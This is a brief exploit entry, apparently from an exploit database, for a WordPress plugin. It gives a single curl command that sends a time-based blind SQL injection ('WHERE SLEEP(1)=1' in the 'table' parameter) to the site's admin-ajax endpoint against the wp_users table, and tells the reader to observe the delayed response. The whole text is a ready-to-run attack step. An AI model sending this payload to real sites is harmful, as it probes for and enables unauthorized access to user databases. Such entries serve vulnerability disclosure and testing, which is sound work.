## https://sploitus.com/exploit?id=WPEX-ID:873824F0-E8B1-45BD-8579-BC3C649A54E5
Run the command:
`curl -i -s -k -X POST --data-binary "action=wdaSetTableActionResponse&table=wp_users%20WHERE%20SLEEP(1)=1%20&request=browse" "https://example.com/wp-admin/admin-ajax.php"`
and see that the response is slow due to the `SLEEP` function.